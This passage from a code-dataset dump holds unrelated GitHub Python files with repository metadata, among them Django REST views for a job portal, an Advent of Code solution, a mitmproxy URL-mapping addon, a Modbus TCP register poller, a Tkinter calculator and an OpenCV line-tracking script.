trendingnews=trending_news(user_account_id=user_account_id,news_title=news_title,news_description=news_description,\n news_image=news_image)\n trendingnews.save()\n\n return Response(status=status.HTTP_201_CREATED)\n\nclass updatenews(APIView):\n def get_object(self, pk):\n try:\n return trending_news.objects.get(pk=pk)\n except trending_news.DoesNotExist:\n raise Http404\n\n def get(self, request, pk, format=None):\n data = self.get_object(pk)\n serializer = trending_news_serializer(data)\n return Response(serializer.data)\n\n def put(self, request, pk, format=None):\n # Get the object to update\n obj = self.get_object(pk)\n \n # Update the object with the request data\n serializer = trending_news_serializer(obj, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_200_OK)\n \n # If the serializer is not valid, return an error response\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n \n def delete(self, request, pk, format=None):\n data = self.get_object(pk)\n data.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n \n\nclass editseekrprofile(APIView):\n def get_object(self, pk):\n try:\n return seeker_profile.objects.get(pk=pk)\n except seeker_profile.DoesNotExist:\n raise Http404\n\n def get(self, request, pk, format=None):\n data = self.get_object(pk)\n serializer = seeker_profile_serializer(data)\n return Response(serializer.data)\n \n def put(self, request, format=None):\n user_account_id = request.data.get('user_account_id')\n\n try:\n seeker_profile = seeker_profile.objects.get(user_account_id=user_account_id)\n education_detail = education_detail.objects.get(user_account_id=user_account_id)\n experience_detail = experience_detail.objects.get(user_account_id=user_account_id)\n seeker_skill_set = seeker_skill_set.objects.get(user_account_id=user_account_id)\n\n seeker_profile.first_name = request.data.get('first_name', seeker_profile.first_name)\n seeker_profile.last_name = request.data.get('last_name', seeker_profile.last_name)\n seeker_profile.current_salary = request.data.get('current_salary', seeker_profile.current_salary)\n seeker_profile.is_annually_monthly = request.data.get('is_annually_monthly', seeker_profile.is_annually_monthly)\n seeker_profile.currency = request.data.get('currency', seeker_profile.currency)\n seeker_profile.uploaded_cv = request.data.get('uploaded_cv', seeker_profile.uploaded_cv)\n seeker_profile.save()\n\n education_detail.certificate_degree_name = request.data.get('certificate_degree_name', education_detail.certificate_degree_name)\n education_detail.major = request.data.get('major', education_detail.major)\n education_detail.institute_university_name = request.data.get('institute_university_name', education_detail.institute_university_name)\n education_detail.starting_date = request.data.get('starting_date', education_detail.starting_date)\n education_detail.completion_date = request.data.get('completion_date', education_detail.completion_date)\n education_detail.percentage = request.data.get('percentage', education_detail.percentage)\n education_detail.cgpa = request.data.get('cgpa', education_detail.cgpa)\n education_detail.save()\n\n experience_detail.is_current_job = request.data.get('is_current_job', experience_detail.is_current_job)\n experience_detail.start_date = request.data.get('start_date', experience_detail.start_date)\n experience_detail.end_date = request.data.get('end_date', experience_detail.end_date)\n experience_detail.job_title 
= request.data.get('job_title', experience_detail.job_title)\n experience_detail.company_name = request.data.get('company_name', experience_detail.company_name)\n experience_detail.job_location_city = request.data.get('job_location_city', experience_detail.job_location_city)\n experience_detail.job_location_state = request.data.get('job_location_state', experience_detail.job_location_state)\n experience_detail.job_location_country = request.data.get('job_location_country', experience_detail.job_location_country)\n experience_detail.description = request.data.get('description', experience_detail.description)\n experience_detail.save()\n\n skill_set_id = request.data.get('skill_set_id', seeker_skill_set.skill_set_id)\n skill_level = request.data.get('skill_level', seeker_skill_set.skill_level)\n seeker_skill_set.skill_set_id = skill_set_id\n seeker_skill_set.skill_level = skill_level\n seeker_skill_set.save()\n\n return Response(status=status.HTTP_200_OK)\n\n except (seeker_profile.DoesNotExist, education_detail.DoesNotExist, experience_detail.DoesNotExist, seeker_skill_set.DoesNotExist):\n return Response(status=status.HTTP_404_NOT_FOUND)\n","repo_name":"zeeyan23/PacificManpower-Backend-","sub_path":"spacificmanpower/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":27630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"11067046060","text":"import aocutils\n\n\ndef deterministic_rolls():\n i = 1\n while True:\n if i < 98:\n yield i * 3 + 3\n i += 3\n else:\n s = 0\n for _ in range(3):\n s += i\n i += 1\n if i > 100:\n i = 1\n yield s\n\ndef main(file):\n print(\"RUNNING\", file)\n lines = list(aocutils.readlines(file))\n p1 = int(lines[0][-1])\n p2 = int(lines[1][-1])\n dice = deterministic_rolls()\n p1_score = 0\n p2_score = 0\n for i in range(9999):\n roll = next(dice)\n p1 = ((p1 + roll - 1) % 10) + 1\n p1_score += p1\n if p1_score >= 1000:\n print(p2_score, '*', (i * 6 + 3))\n print(p2_score * (i * 6 + 3))\n return\n\n roll = next(dice)\n p2 = ((p2 + roll - 1) % 10) + 1\n p2_score += p2\n if p2_score >= 1000:\n print(p1_score, '*', (i * 6 + 6))\n print(p1_score * (i * 6 + 6))\n return\n\n\nif __name__ == '__main__':\n main(\"example.txt\")\n print(739785, \"expected\")\n main(\"input.txt\")\n","repo_name":"martenbr/aoc","sub_path":"aoc2021/dec21/dirac1.py","file_name":"dirac1.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18248181356","text":"import cv2\nimport pickle\nimport pandas as pd\nfrom PIL import Image\nfrom src.Utils import encoding\nfrom src.components.DBStudentInsert import insertstudent\n\ndf = pd.read_csv(r'data/attendance.csv',index_col='Index')\n\ndef addStudent():\n '''Adds a new student's attendance record in Database & his/her image in Image folder'''\n\n name = input('Enter your name: ')\n if name not in df['Student_name'].values:\n eng = int(input('English Attendance: '))\n math = int(input('Math Attendance: '))\n sci = int(input('Science Attendance: '))\n\n df.loc[len(df.index)] = [name,eng,math,sci]\n df.to_csv(r'data/attendance.csv')\n print(df)\n\n insertstudent(name,eng,math,sci)\n\n cap=cv2.VideoCapture(0)\n while True:\n _,frame=cap.read()\n img = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n img = Image.fromarray(frame)\n img.convert('RGB')\n img.save(f'Images\\{name}.jpg')\n\n encoding(name)\n\n cv2.imshow('Face Cropper',frame)\n\n if (cv2.waitKey(1) & 0xFF == ord('q')):\n 
break\n cap.release()\n cv2.destroyAllWindows()\n\n with open(r'data/Names.pkl','wb') as file:\n pickle.dump(name,file)\n\n print('Name added sucessfully')\n else: \n return print(\"Name already present inside DB\")","repo_name":"sVinit108/Automatic_Attendance_System_Using_Face_Recognition","sub_path":"src/components/addStudent.py","file_name":"addStudent.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"40537018203","text":"\"\"\"add tool feature tables\n\nRevision ID: defbda3bf2b5\nRevises: 39e860a11b05\nCreate Date: 2020-09-01 20:12:57.300147\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'defbda3bf2b5'\ndown_revision = '39e860a11b05'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n m = sa.MetaData(op.get_bind())\n m.reflect()\n if \"next_id\" in m.tables:\n with op.batch_alter_table(\"next_id\") as batch_op:\n batch_op.add_column(sa.Column(\"tool_id\", sa.Integer, server_default=sa.null()))\n batch_op.add_column(sa.Column(\"feature_id\", sa.Integer, server_default=sa.null()))\n batch_op.add_column(sa.Column(\"tool_feature_id\", sa.Integer, server_default=sa.null()))\n batch_op.add_column(sa.Column(\"tool_feature_method_id\", sa.Integer, server_default=sa.null()))\n op.create_table(\n \"tool\",\n sa.Column(\"id\", sa.Integer, primary_key=True),\n sa.Column(\"name\", sa.String(155), nullable=False),\n sa.Column(\"description\", sa.String(255), server_default=sa.null()),\n sa.Column(\"commit_id\", sa.Integer, sa.ForeignKey(\"commit.id\")),\n )\n op.create_table(\n \"feature\",\n sa.Column(\"id\", sa.Integer, primary_key=True),\n sa.Column(\"parameter_definition_id\", sa.Integer, nullable=False),\n sa.Column(\"parameter_value_list_id\", sa.Integer, nullable=False),\n sa.Column(\"description\", sa.String(255), server_default=sa.null()),\n sa.Column(\"commit_id\", sa.Integer, sa.ForeignKey(\"commit.id\")),\n sa.UniqueConstraint(\"parameter_definition_id\", \"parameter_value_list_id\"),\n sa.ForeignKeyConstraint(\n (\"parameter_definition_id\", \"parameter_value_list_id\"),\n (\"parameter_definition.id\", \"parameter_definition.parameter_value_list_id\"),\n onupdate=\"CASCADE\",\n ondelete=\"CASCADE\",\n ),\n )\n op.create_table(\n \"tool_feature\",\n sa.Column(\"id\", sa.Integer, primary_key=True),\n sa.Column(\"tool_id\", sa.Integer, sa.ForeignKey(\"tool.id\")),\n sa.Column(\"feature_id\", sa.Integer, nullable=False),\n sa.Column(\"parameter_value_list_id\", sa.Integer, nullable=False),\n sa.Column(\"required\", sa.Boolean(name=\"required\"), server_default=sa.false(), nullable=False),\n sa.Column(\"commit_id\", sa.Integer, sa.ForeignKey(\"commit.id\")),\n sa.UniqueConstraint(\"tool_id\", \"feature_id\"),\n sa.ForeignKeyConstraint(\n (\"feature_id\", \"parameter_value_list_id\"),\n (\"feature.id\", \"feature.parameter_value_list_id\"),\n onupdate=\"CASCADE\",\n ondelete=\"CASCADE\",\n ),\n )\n op.create_table(\n \"tool_feature_method\",\n sa.Column(\"id\", sa.Integer, primary_key=True),\n sa.Column(\"tool_feature_id\", sa.Integer, nullable=False),\n sa.Column(\"parameter_value_list_id\", sa.Integer, nullable=False),\n sa.Column(\"method_index\", sa.Integer),\n sa.Column(\"commit_id\", sa.Integer, sa.ForeignKey(\"commit.id\")),\n sa.UniqueConstraint(\"tool_feature_id\", \"method_index\"),\n sa.ForeignKeyConstraint(\n (\"tool_feature_id\", \"parameter_value_list_id\"),\n (\"tool_feature.id\", 
\"tool_feature.parameter_value_list_id\"),\n onupdate=\"CASCADE\",\n ondelete=\"CASCADE\",\n ),\n sa.ForeignKeyConstraint(\n (\"parameter_value_list_id\", \"method_index\"),\n (\"parameter_value_list.id\", \"parameter_value_list.value_index\"),\n onupdate=\"CASCADE\",\n ondelete=\"CASCADE\",\n ),\n )\n\n\ndef downgrade():\n pass\n","repo_name":"spine-tools/Spine-Database-API","sub_path":"spinedb_api/alembic/versions/defbda3bf2b5_add_tool_feature_tables.py","file_name":"defbda3bf2b5_add_tool_feature_tables.py","file_ext":"py","file_size_in_byte":3618,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"54"} +{"seq_id":"43378373806","text":"from typing import AnyStr, Dict\n\nimport kombu_batteries_included\nfrom marshmallow import INCLUDE, Schema, fields\nfrom she_logging import logger\n\nfrom dhos_async_adapter.clients import encounters_api\nfrom dhos_async_adapter.helpers import actions\nfrom dhos_async_adapter.helpers.actions import ActionsMessageNoConnectorId\nfrom dhos_async_adapter.helpers.validation import validate_message_body_dict\n\nROUTING_KEY = \"dhos.DM000004\"\n\n\nclass ObservationSet(Schema):\n class Meta:\n unknown = INCLUDE\n\n encounter_id = fields.String(required=True)\n\n\nclass ProcessObservationSetAction(Schema):\n observation_set = fields.Nested(ObservationSet, required=True)\n\n\ndef process(body: AnyStr) -> None:\n \"\"\"\n - Summary: Appends encounter information from Encounters API to a published observation set notification.\n - Routing Key: dhos.DM000004\n - Body: A group of actions in the format published by the Connector API service.\n - Notes: Part of the chain that results in an ORU HL7 message. Results in an dhos.DM000005 message being published.\n - Endpoint(s):\n - GET /dhos-encounters/dhos/v1/encounter/\n - POST /dhos-encounters/dhos/v2/encounter\n - PATCH /dhos-encounters/dhos/v1/encounter/\n \"\"\"\n logger.info(\n \"Received observation set notification message (%s)\",\n ROUTING_KEY,\n )\n\n # Load and validate message body.\n logger.debug(\n \"Observation set notification message body (%s)\",\n ROUTING_KEY,\n extra={\"message_body\": body},\n )\n actions_message: Dict = validate_message_body_dict(\n body=body, schema=ActionsMessageNoConnectorId, unknown=INCLUDE\n )\n\n action_data = actions.extract_action(\n message=actions_message, action_name=\"process_observation_set\"\n )[\"data\"]\n\n validated_action_data: Dict = ProcessObservationSetAction().load(\n action_data, unknown=INCLUDE\n )\n\n # Get the encounter details\n encounter: Dict = encounters_api.get_encounter_by_uuid(\n encounter_uuid=validated_action_data[\"observation_set\"][\"encounter_id\"]\n )\n validated_action_data[\"encounter\"] = encounter\n\n processed_msg = {\n \"actions\": [{\"name\": \"process_observation_set\", \"data\": validated_action_data}]\n }\n kombu_batteries_included.publish_message(\n routing_key=\"dhos.DM000005\", body=processed_msg\n )\n","repo_name":"huma-engineering/polaris-async-adapter","sub_path":"dhos_async_adapter/callbacks/encounter_obs_set_notification.py","file_name":"encounter_obs_set_notification.py","file_ext":"py","file_size_in_byte":2384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26839511362","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom . 
import views\n\napp_name = 'weather'\n\nurlpatterns = [\n path('', views.index, name='weather_list'),\n path('detail//', views.CityDetailView.as_view(), name='city_detail'),\n path('delete//', views.CityDeleteView.as_view(), name='city_delete'),\n path('new/', views.CityCreateView.as_view(), name='new_city'),\n]\n","repo_name":"erinrosenbaum/my_website","sub_path":"weather/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16230549550","text":"import re\nimport typing\n\nfrom mitmproxy import exceptions, http\nfrom mitmproxy import ctx\nfrom mitmproxy.addons.modifyheaders import parse_modify_spec, ModifySpec\n\n\nclass MapRemote:\n def __init__(self):\n self.replacements: typing.List[ModifySpec] = []\n\n def load(self, loader):\n loader.add_option(\n \"map_remote\", typing.Sequence[str], [],\n \"\"\"\n Replacement pattern of the form \"[/flow-filter]/regex/[@]replacement\", where\n the separator can be any character. The @ allows to provide a file path that\n is used to read the replacement string.\n \"\"\"\n )\n\n def configure(self, updated):\n if \"map_remote\" in updated:\n self.replacements = []\n for option in ctx.options.map_remote:\n try:\n spec = parse_modify_spec(option, True)\n except ValueError as e:\n raise exceptions.OptionsError(f\"Cannot parse map_remote option {option}: {e}\") from e\n\n self.replacements.append(spec)\n\n def request(self, flow: http.HTTPFlow) -> None:\n if flow.reply and flow.reply.has_message:\n return\n for spec in self.replacements:\n if spec.matches(flow):\n try:\n replacement = spec.read_replacement()\n except IOError as e:\n ctx.log.warn(f\"Could not read replacement file: {e}\")\n continue\n\n url = flow.request.pretty_url.encode(\"utf8\", \"surrogateescape\")\n new_url = re.sub(spec.subject, replacement, url)\n # this is a bit messy: setting .url also updates the host header,\n # so we really only do that if the replacement affected the URL.\n if url != new_url:\n flow.request.url = new_url\n","repo_name":"everstou/autoScript","sub_path":"MitmScript/mitmproxy-master/mitmproxy/addons/mapremote.py","file_name":"mapremote.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2781528644","text":"import tkinter as tk\r\nfrom tkinter import messagebox\r\n\r\n\r\nclass Functions:\r\n def __init__(self, number1, number2, app):\r\n self.numero1 = number1\r\n self.numero2 = number2\r\n self.app = app\r\n def soma(self):\r\n somar = float(self.numero1.get())+float(self.numero2.get())\r\n resposta = tk.Label(text=f'Resposta da soma: {somar}',bg='#DCDCDC', font=(\"Arial\", 10))\r\n resposta.grid(columnspan=2, row=5, pady=10, padx=5, sticky='nswe')\r\n\r\n def mult(self):\r\n multiplicar = float(self.numero1.get())*float(self.numero2.get())\r\n resposta = tk.Label(text=f'Resposta da Multiplicação: {multiplicar}', bg='#DCDCDC', font=(\"Arial\", 10))\r\n resposta.grid(columnspan=2, row= 5, pady=10, padx=10,sticky='nswe')\r\n\r\n def dividir(self):\r\n try:\r\n divisao = float(self.numero1.get())/float(self.numero2.get())\r\n resposta = tk.Label(text=f'Resposta da divisão: {divisao:.2f}', bg='#DCDCDC', font=(\"Arial\", 10))\r\n resposta.grid(columnspan=2, row=5, pady=10, padx=10, sticky='nswe')\r\n except ZeroDivisionError:\r\n resposta = tk.Label(text= 'Você esta tentando dividir um numero por 0',bg='#DCDCDC', font=(\"Arial\", 
10))\r\n resposta.grid(columnspan=2, row=5, pady=10, padx=10, sticky='nswe')\r\n\r\n def sub(self):\r\n subtrair = float(self.numero1.get()) - float(self.numero2.get())\r\n resposta = tk.Label(text=f'Resposta da subtração: {subtrair}', bg='#DCDCDC', font=(\"Arial\", 10))\r\n resposta.grid(columnspan=2, row=5, pady=10, sticky='nswe')\r\n\r\n def potencia(self):\r\n potenciacao = float(self.numero1.get())**float(self.numero2.get())\r\n resposta = tk.Label(text=f'Resposta da potenciação: {potenciacao}', bg='#DCDCDC', font=(\"Arial\", 10))\r\n resposta.grid(columnspan=2, row=5, pady=10, sticky='nswe')\r\n\r\n def porcentagem(self):\r\n porc = float(self.numero1.get())*float(self.numero2.get()) / 100\r\n resposta = tk.Label(text=f'Resposta da porcentagem: {porc}', bg='#DCDCDC', font=(\"Arial\", 10))\r\n resposta.grid(columnspan=2, row=5, pady=10, sticky='nswe')\r\n\r\n def direitos_reservados(self):\r\n vazio = tk.Label()\r\n vazio.grid(row = 5, columnspan=2, padx=10, pady=10)\r\n mensagem = tk.Label(text='Todos os direitos reservados. @Jefferson.python', fg='black',bg='#D3D3D3',font=(\"-weight bold-size 10\", 8))\r\n mensagem.grid(columnspan=2, row=7, sticky='nswe')\r\n\r\n def fechar_app(self):\r\n confirmacao = tk.messagebox.askquestion('Fechando calculadora','Deseja realmente sair?')\r\n if confirmacao == 'yes':\r\n self.app.destroy()\r\n else:\r\n pass\r\n def center(self, win):\r\n\r\n win.update_idletasks()\r\n\r\n width = win.winfo_width()\r\n frm_width = win.winfo_rootx() - win.winfo_x()\r\n win_width = width + 2 * frm_width\r\n\r\n height = win.winfo_height()\r\n titlebar_height = win.winfo_rooty() - win.winfo_y()\r\n win_height = height + titlebar_height + frm_width\r\n\r\n x = win.winfo_screenwidth() // 2 - win_width // 2\r\n y = win.winfo_screenheight() // 2 - win_height // 2\r\n\r\n win.geometry('{}x{}+{}+{}'.format(width, height, x, y))\r\n\r\n win.deiconify()\r\n\r\nif '__main__' == __name__:\r\n\r\n pass","repo_name":"jeffin-Dev/Calculadora_Basica","sub_path":"BackendCalculation.py","file_name":"BackendCalculation.py","file_ext":"py","file_size_in_byte":3307,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"41139094064","text":"import threading\nimport time\nfrom pyModbusTCP.client import ModbusClient\nimport openpyxl\nimport random\nimport numpy as np\n\nt_start = time.perf_counter()\n\n\nbook = openpyxl.open('test.xlsx', read_only=True)\nsheet = book.active\nbook_save = openpyxl.Workbook()\nsheet_save = book_save.active\nfull_list = list()\nsingle_dict = dict()\nresult_list = list()\ntemp_result_list = list()\ntemptemp = []\nserver_host = ''\nserver_port = 0\nstart_reg = 0\nreg_qnty = 0\nb = 0\ncount_check = 0\nkeyslist = []\nfinal_list = []\nfinal_output = []\n\n\nfor rows in range(1, sheet.max_row+1):\n single_dict[\"server_host\"] = sheet[rows][0].value\n single_dict[\"server_port\"] = int(sheet[rows][1].value)\n single_dict[\"start_reg\"] = int(sheet[rows][3].value)\n single_dict[\"reg_qnty\"] = int(sheet[rows][4].value)\n temptemp = sheet[rows][5].value\n res = {int(sub.split(\":\")[0]): sub.split(\":\")[1] for sub in temptemp[1:-1].split(\", \")}\n single_dict[\"task_list\"] = res\n # single_dict[\"task_list\"] = sheet[rows][5].value\n full_list.append(single_dict.copy())\n # print(temptemp)\n # print(res)\n\n\n# print(full_list)\nall_time = time.perf_counter() - t_start\nprint(f'Время генерации списка: {all_time}')\n\n\ndef modbus(host, port, addr, reg, task_list):\n # open or reconnect TCP to server\n c = 
ModbusClient()\n c.host(host)\n c.port(port)\n time.sleep(random.random())\n if not c.is_open():\n if not c.open():\n print(\"unable to connect to \" + host + \":\" + str(port) + str(addr))\n final_output.append([f'unable to connect {host}'])\n # if open() is ok, read register (modbus function 0x03)\n if c.is_open():\n # read 10 registers at address 0, store result in regs list\n regs = c.read_holding_registers(addr, reg)\n # if success display registers\n if regs:\n typelist = list(task_list.values())\n keyslist = list(task_list.keys())\n # print(\"reg ad #0 to 9: \" + str(regs))\n final_list = [regs[key] for key in keyslist]\n # print(str(final_list))\n # print(str(keyslist))\n # print(str(typelist))\n q = 0\n final_small_output = [host, addr, reg]\n for type in typelist:\n if type == \"UINT16\":\n count = np.uint16(regs[keyslist[q]])\n # print(count, q)\n key_final = regs[keyslist[q]]\n final_small_output.append(f'{keyslist[q]}: {count}')\n q += 1\n elif type == \"INT16\":\n count = np.int16(regs[keyslist[q]])\n # print(count, q)\n final_small_output.append(f'{keyslist[q]}: {count}')\n q += 1\n elif type == \"UINT32\":\n count = (np.uint16(regs[keyslist[q] + 1]) << 16) + np.uint16(regs[keyslist[q]])\n # print(count, q)\n final_small_output.append(f'{keyslist[q]}: {count}')\n q += 1\n elif type == \"INT32\":\n count = (np.int16(regs[keyslist[q] + 1]) << 16) + np.uint16(regs[keyslist[q]])\n # print(count, q)\n final_small_output.append(f'{keyslist[q]}: {count}')\n q += 1\n else:\n print(\"error data TYPE\")\n final_small_output.append([f'Error data TYPE {host}{keyslist[q]}: {keyslist[q]}'])\n final_output.append(final_small_output)\n else:\n final_output.append([f'unable to read register {host} {addr}'])\n\n\nthreads = []\n\nfor device in full_list:\n t = threading.Thread(target=modbus, args=[device['server_host'], device['server_port'], device['start_reg'],\n device['reg_qnty'], device['task_list']])\n t.start()\n threads.append(t)\n\nfor thread in threads:\n thread.join()\n\n\nfor answ in final_output:\n sheet_save.append(answ)\n\nbook_save.save('result.xlsx')\nall_time = time.perf_counter() - t_start\nprint(f'Время выполнения опроса: {all_time}')\n","repo_name":"SmoktoK/ModBus_Satec","sub_path":"old_version/SATEC.py","file_name":"SATEC.py","file_ext":"py","file_size_in_byte":4153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33579145029","text":"# import shutil\nfrom file_operations.File_operations_Azure import File_Operations\n\nclass File_Operation:\n \"\"\"\n This class shall be used to save the model after training\n and load the saved model for prediction.\n\n Written By: iNeuron Intelligence\n Version: 1.0\n Revisions: None\n\n \"\"\"\n def __init__(self,file_object,logger_object):\n self.file_object = file_object\n self.logger_object = logger_object\n self.fileoperation = File_Operations(log=self.logger_object)\n self.model_directory = \"models\"\n\n def create_model_directory(self):\n self.logger_object.db_log(self.file_object,\n message={\n \"message\": \"Creating directory to keep training models\"})\n try:\n self.fileoperation.create_container(container_name=self.model_directory)\n except Exception as e:\n raise Exception()\n\n\n def save_model(self,model,filename):\n \"\"\"\n Method Name: save_model\n Description: Save the model file to directory\n Outcome: File gets saved\n On Failure: Raise Exception\n\n Written By: iNeuron Intelligence\n Version: 1.0\n Revisions: None\n\"\"\"\n 
self.logger_object.db_log(self.file_object,\n message={\"message\": \"Entered the save_model method of the File_Operation class\"})\n\n try:\n # self.fileoperation.create_container(container_name=self.model_directory)\n # path = os.path.join(self.model_directory,filename) #create seperate directory for each cluster\n # if os.path.isdir(path): #remove previously existing models for each clusters\n # shutil.rmtree(self.model_directory)\n # os.makedirs(path)\n # else:\n # os.makedirs(path) #\n # with open(path +'/' + filename+'.sav',\n # 'wb') as f:\n # pickle.dump(model, f) # save the model to file\n filename = filename+'.sav'\n self.fileoperation.savemodel(container_name=self.model_directory, filename=filename, model=model)\n self.logger_object.db_log(self.file_object,\n message={\"success Message\":\n \"Model File \"+filename+\" saved. Exited the save_model method of the Model_Finder class\"})\n\n return 'success'\n except Exception as e:\n self.logger_object.db_log(self.file_object,\n message={\"Error message\":\n \"Exception occured in save_model method of the Model_Finder class. Exception message: \" + str(e)})\n self.logger_object.db_log(self.file_object,\n message={\"Error while saving\":\n 'Model File '+filename+' could not be saved. Exited the save_model method of the Model_Finder class'})\n raise Exception()\n\n def load_model(self,filename):\n \"\"\"\n Method Name: load_model\n Description: load the model file to memory\n Output: The Model file loaded in memory\n On Failure: Raise Exception\n\n Written By: iNeuron Intelligence\n Version: 1.0\n Revisions: None\n \"\"\"\n self.logger_object.db_log(self.file_object,\n message={\"load model message\": \"Entered the load_model method of the File_Operation class\"})\n try:\n # with open(self.model_directory + filename + '/' + filename + '.sav',\n # 'rb') as f:\n if '.sav' not in filename:\n filename = filename+'.sav'\n model = self.fileoperation.loadmodel(container_name=self.model_directory, filename=filename)\n self.logger_object.db_log(self.file_object,\n message={\"model loaded successfully\": \"Model File \" + filename + \"loaded. Exited the load_model method of the Model_Finder class\"})\n # return pickle.load(f)\n return model\n except Exception as e:\n self.logger_object.db_log(self.file_object,\n message={\"Model load Error\":\n \"Exception occured in load_model method of the Model_Finder class. Exception message: \" + str(e)})\n self.logger_object.db_log(self.file_object,\n message= {\"Model Error message\":\n \"Model File \" + filename + \" could not be saved. 
Exited the load_model method of the Model_Finder class\"})\n raise Exception()\n\n def find_correct_model_file(self,cluster_number):\n \"\"\"\n Method Name: find_correct_model_file\n Description: Select the correct model based on cluster number\n Output: The Model file\n On Failure: Raise Exception\n\n Written By: iNeuron Intelligence\n Version: 1.0\n Revisions: None\n \"\"\"\n self.logger_object.db_log(self.file_object,\n message={\"correct model select\": \"Entered the find_correct_model_file method of the File_Operation class\"})\n try:\n self.cluster_number= cluster_number\n self.folder_name=self.model_directory\n # self.list_of_model_files = []\n # self.list_of_files = self.fileoperation.getallFiles(container_name=self.folder_name)\n\n for self.file in self.list_of_files:\n try:\n if (self.file.index(str( self.cluster_number))!=-1):\n self.model_name = self.file\n except:\n continue\n self.model_name=self.model_name\n self.logger_object.db_log(self.file_object,\n {\"success message\": \"Exited the find_correct_model_file method of the Model_Finder class.\"})\n return self.model_name\n except Exception as e:\n self.logger_object.db_log(self.file_object,\n {\"Model selector Error message\":\n \"Exception occured in find_correct_model_file method of the Model_Finder class. Exception message: \" + str(e)})\n self.logger_object.db_log(self.file_object,\n {\"Model selector Error message\":\n \"Exited the find_correct_model_file method of the Model_Finder class with Failure\"})\n raise Exception()","repo_name":"arkajit0/waferfault-detection","sub_path":"file_operations/file_methods.py","file_name":"file_methods.py","file_ext":"py","file_size_in_byte":7067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16387190808","text":"import cv2, time, math\nimport numpy as np\n\ndef nothing(x):\n pass\n\ncam = cv2.VideoCapture(0)\n\ncv2.namedWindow(\"ColorTrackbars\")\ncv2.createTrackbar(\"min - H\", \"ColorTrackbars\", 0, 179, nothing)\ncv2.createTrackbar(\"min - S\", \"ColorTrackbars\", 0, 255, nothing)\ncv2.createTrackbar(\"min - V\", \"ColorTrackbars\", 0, 255, nothing)\ncv2.createTrackbar(\"max - H\", \"ColorTrackbars\", 179, 179, nothing)\ncv2.createTrackbar(\"max - S\", \"ColorTrackbars\", 255, 255, nothing)\ncv2.createTrackbar(\"max - V\", \"ColorTrackbars\", 100, 255, nothing)\n\ncolor = (255,255,255)\nprev_frame_time = 0\nnew_frame_time = 0\nif cam.isOpened():\n ret,frame = cam.read()\nelse: \n ret = False\nwhile ret :\n ret,frame = cam.read()\n \n frame = cv2.imread(\"Seeker/TargetImages/line1.png\")\n frame_width, frame_height = (480,480)\n frame = cv2.resize(frame,(frame_width, frame_height))\n #frame =cv2.flip(frame,-1)\n center_frame = (frame_width//2, frame_height//2)\n blurred = cv2.GaussianBlur(frame,(3,3),0)\n hsv_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n #Calculate FPS\n new_frame_time = time.time()\n fps = 1/(new_frame_time-prev_frame_time)\n prev_frame_time = new_frame_time\n cv2.putText(frame,\"FPS:{}\".format(int(fps)),(15,15),cv2.FONT_HERSHEY_SIMPLEX,.5,(255,255,255),1,cv2.LINE_AA)#Displays fps\n\n target_track_radius = 50\n cv2.circle(frame, (frame_width//2, frame_height//2), target_track_radius, (255,0,0), 1)\n cv2.line(frame,(int(frame_width/2 ),0),(int(frame_width/2 ),int(frame_height)),(255,0,0),1)\n cv2.line(frame,(0,int(frame_height/2 )),(int(frame_width),int(frame_height/2 )),(255,0,0),1)\n \n\n min_h = cv2.getTrackbarPos(\"min - H\", \"ColorTrackbars\")\n min_s = cv2.getTrackbarPos(\"min - S\", 
\"ColorTrackbars\")\n min_v = cv2.getTrackbarPos(\"min - V\", \"ColorTrackbars\")\n max_h = cv2.getTrackbarPos(\"max - H\", \"ColorTrackbars\")\n max_s = cv2.getTrackbarPos(\"max - S\", \"ColorTrackbars\")\n max_v = cv2.getTrackbarPos(\"max - V\", \"ColorTrackbars\")\n min_color = np.array([min_h, min_s, min_v])\n max_color = np.array([max_h, max_s, max_v])\n mask_color = cv2.inRange(hsv_frame, min_color, max_color)\n\n contours, hierarchy = cv2.findContours(mask_color, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE) #SIMPLE\n #contours = max(contours, key = cv2.contourArea)\n \n contours = sorted(contours, key = cv2.contourArea)\n contours = contours[-1:] # Take the object with the largest area\n\n for contour in contours:\n if cv2.contourArea(contour) >= 500: # If area is big enough, find its center etc.\n contour = cv2.approxPolyDP(contour, 10, closed=True)\n cv2.drawContours(frame, contour, -1, (255,255,0), 5, lineType = cv2.FILLED)\n print(\"len(contour): \",len(contour))\n cv2.polylines(frame, [contour], True, (0,255,255), 2)\n \"\"\"\n x,y,w,h = cv2.boundingRect(contour)\n x,y,w,h = (int(x),int(y),int(w),int(h))\n cv2.rectangle(frame,(x,y),(x+w,y+h),(0,0,255),3)\n cv2.line(frame, (x+(w//2),frame_height),(x+(w//2),frame_width ),(0,255,0),3)\n \"\"\"\n\n moment = cv2.moments(contour) # To find the center of the contour, we use cv2.moment\n (x_contour, y_contour) = (moment['m10'] / 